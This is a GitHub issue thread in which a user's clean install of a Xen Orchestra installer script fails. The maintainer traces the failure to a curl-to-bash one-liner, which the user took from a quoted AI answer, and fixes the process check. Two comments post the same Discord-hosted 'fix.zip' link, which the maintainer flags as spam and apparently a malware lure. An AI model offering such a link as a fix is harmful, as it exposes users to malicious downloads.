### ISSUE TITLE
Fails for new install.

### ISSUE THREAD

**Issue by eangulus** [ronivay/XenOrchestraInstallerUpdater#253]
**Debian 12.6**:
**No Node**: node -v
**No Yarn**: yarn -v

**Server specs**
2 CPU's, 4Gb RAM XCP VM.

**Issue**
I run the script for the new install and it tells me xo-server service is already running. I double checked no service there at all and never has been (clean debian install). I hit y to continue then it fails because it cant stop the non-existent service.

**Installation logfile**
Have no idea where the logs are but here's a copy of my terminal:

root@DEBIAN-TEMPLATE-12-6-0:~# bash -c "$(curl -s https://raw.githubusercontent.com/ronivay/XenOrchestraInstallerUpdater/master/xo-install.sh)"
cp: cannot stat './sample.xo-install.cfg': No such file or directory
bash: line 21: ./xo-install.cfg: No such file or directory
-----------------------------------------

Welcome to automated Xen Orchestra install

Following options will be used for installation:

OS: Debian 12
Basedir: /opt/xo
User: root
Port: 80
HTTPS: false
Git Branch for source: master
Following plugins will be installed: all
Number of previous installations to preserve: 3
Node.js and yarn auto update: true

Errorlog is stored to /root/logs/xo-install.log-202409031526 for debug purposes

Depending on which installation is chosen:

Xen Orchestra configuration will be stored to /root/.config/xo-server/config.toml, if you don't want it to be replaced with every update, set CONFIGUPDATE to false in xo-install.cfg
Xen Orchestra Proxy configuration will be stored to /root/.config/xo-proxy/config.toml. Config won't be overwritten during update, ever
-----------------------------------------

1. Install
2. Update
3. Rollback
4. Install proxy
5. Update proxy
6. Exit

: 1
Looks like xo-server process is already running, consider running update instead. Continue anyway?
[y/N]: y
Stopping xo-server...
[fail] failed to stop service, exiting...
root@DEBIAN-TEMPLATE-12-6-0:~# node -v
-bash: node: command not found
root@DEBIAN-TEMPLATE-12-6-0:~# yarn -v
-bash: yarn: command not found
root@DEBIAN-TEMPLATE-12-6-0:~#

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by ronivay** [comment]
> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

DO NOT TRY THIS, it's a spam post!

**Comment by ronivay** [comment]
> > try this `random link here` select the desired compiler in the installer
> 
> DO NOT TRY THIS, it's a spam post!
> 
> E: Deleted the comment

**Comment by ronivay** [comment]
Could you please run `pgrep -f 'node.*xo-server'` on the server you're trying to install xo-server to, to see why it fails the check.

**Comment by eangulus** [comment]
Nothing comes up.

root@DEBIAN-TEMPLATE-12-6-0:~# pgrep -f 'node.*xo-server'
root@DEBIAN-TEMPLATE-12-6-0:~#

**Comment by eangulus** [comment]
This is a 100% new Debian install. Clean base Debian 12.6 and the only thing I have installed is nfs for some shares and Webmin.

**Comment by ronivay** [comment]
> Nothing comes up.
> 
> root@DEBIAN-TEMPLATE-12-6-0:~# pgrep -f 'node.*xo-server' root@DEBIAN-TEMPLATE-12-6-0:~#

Hmm i don't get why it would complain then that xo-server is already running. Check the logs then if there's anything. You mentioned you have no idea where the logs are. Check the output of the script and it'll tell you :) `Errorlog is stored to /root/logs/xo-install.log-202409031526 for debug purposes`

**Comment by eangulus** [comment]
Running script version undefined with config:

No config file found

+ id -u
0
+ uname -m
x86_64
+ command -v xe
+ grep ^VERSION_ID /etc/os-release | cut -d'=' -f2 | grep -Eo '[0-9]{1,2}' | head -1
12
+ grep ^NAME /etc/os-release | cut -d'=' -f2 | sed 's/"//g' | awk '{print $1}'
Debian
+ grep ^GRUB_DISTRIBUTOR /etc/default/grub | grep 'Xen Orchestra'
+ command -v dnf
+ command -v apt-get
/usr/bin/apt-get
+ command -v systemctl
/usr/bin/systemctl
+ df -P -k '/opt' | tail -1 | awk '{print $4}'
11976340
+ grep MemTotal /proc/meminfo | awk '{print $2}'
3983668
+ pgrep -f 'node.*xo-server'
5062
5131
+ /bin/systemctl stop xo-server
Failed to stop xo-server.service: Unit xo-server.service not loaded.

**Comment by ronivay** [comment]
What are those two pids that it found before? `ps -p 5062` and `ps -p 5131`

**Comment by eangulus** [comment]
Not sure, they dont seem to be there.

root@DEBIAN-TEMPLATE-12-6-0:~# ps -p 5062
    PID TTY          TIME CMD
root@DEBIAN-TEMPLATE-12-6-0:~# ps -p 5131
    PID TTY          TIME CMD
root@DEBIAN-TEMPLATE-12-6-0:~#

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by ronivay** [comment]
Beats me. Based on this, it should work just fine now.

**Comment by eangulus** [comment]
just tried again. and nope. same error.

I just tried again, and before answering if I want to continue (after detecting I am already running xo-server) I looked in the logs, there a different numbers there this time and they also don't exist. There are no processes with the numbers from the logs.

**Comment by eangulus** [comment]
Just had top runnign and tried again. I got 1 of the pid's from the latest logs.

8432 root      20   0    7828   4392   3164 S   0.0   0.1   0:00.00 bash

**Comment by ronivay** [comment]
> just tried again. and nope. same error.
> 
> I just tried again, and before answering if I want to continue (after detecting I am already running xo-server) I looked in the logs, there a different numbers there this time and they also don't exist. There are no processes with the numbers from the logs.

Ah now i get it. It's because you're the script via curl as oneliner which isn't a documented way to use xo-install.sh. Since basically the entire script content is found from ps output, it'll cause the process check to fail. Please clone the repository first as instructed and then run the xo-install.sh script after that.

**Comment by eangulus** [comment]
OK, will do that Thank you.

Thanks heaps for the fast responses too, didn't expect this.

I used this method cause stupid AI told me to.

`For installing Xen Orchestra on a Debian VM and allowing easy updates, I recommend using the XenOrchestraInstallerUpdater script by ronivay. This script automates the installation process and provides an easy way to update Xen Orchestra in the future.
Here are the steps to use this script:
First, ensure your Debian VM meets the minimum requirements:
At least 4GB of RAM
About 1GB of free disk space
2 vCPUs recommended
Connect to your Debian VM via SSH as root or a user with sudo privileges.
Run the following command to download and execute the installation script:
bash
bash -c "$(curl -s https://raw.githubusercontent.com/ronivay/XenOrchestraInstallerUpdater/master/xo-install.sh)"

The script will automatically install all necessary dependencies, compile Xen Orchestra from source, and set it up as a systemd service.
Once the installation is complete, you can access Xen Orchestra through your web browser using the VM's IP address.
To update Xen Orchestra in the future, you can simply run the same script again. It will detect the existing installation and perform an update.
Key benefits of using this script:
Supports Debian 10, 11, and 12
Automatically installs all required dependencies
Compiles Xen Orchestra from source, giving you access to all features
Sets up Xen Orchestra as a systemd service for easy management
Provides an easy way to update your installation in the future
Remember to secure your Xen Orchestra installation by changing the default credentials and configuring proper access controls after the initial setup.`

**Comment by eangulus** [comment]
I should have verified better... and done some more reading.

**Comment by ronivay** [comment]
Technically that should work too. It's just the process check that isn't tested with this. I might look into improving it as it's a bit stupid how it fails here :)

**Comment by eangulus** [comment]
Stupid question I think, I haven't done much with GitHub stuff before, but how do I clone?

I cant find the instructions here, I can only see that you say to first clone.

**Comment by ronivay** [comment]
> Stupid question I think, I haven't done much with GitHub stuff before, but how do I clone?
> 
> I cant find the instructions here, I can only see that you say to first clone.

Just install `git` first to the machine with `apt install -y git` and then `git clone https://github.com/ronivay/XenOrchestraInstallerUpdater`. Then jump to the cloned dir with `cd XenOrchestraInstallerUpdater` and finally run the script with `./xo-install.sh` and you should be good.

**Comment by eangulus** [comment]
Cool. Thanks again.

**Comment by ronivay** [comment]
I'm going to assume you got the install going and will close this :)

I merged an improvement to the running process check. It should match better now to actually running xo-server process.
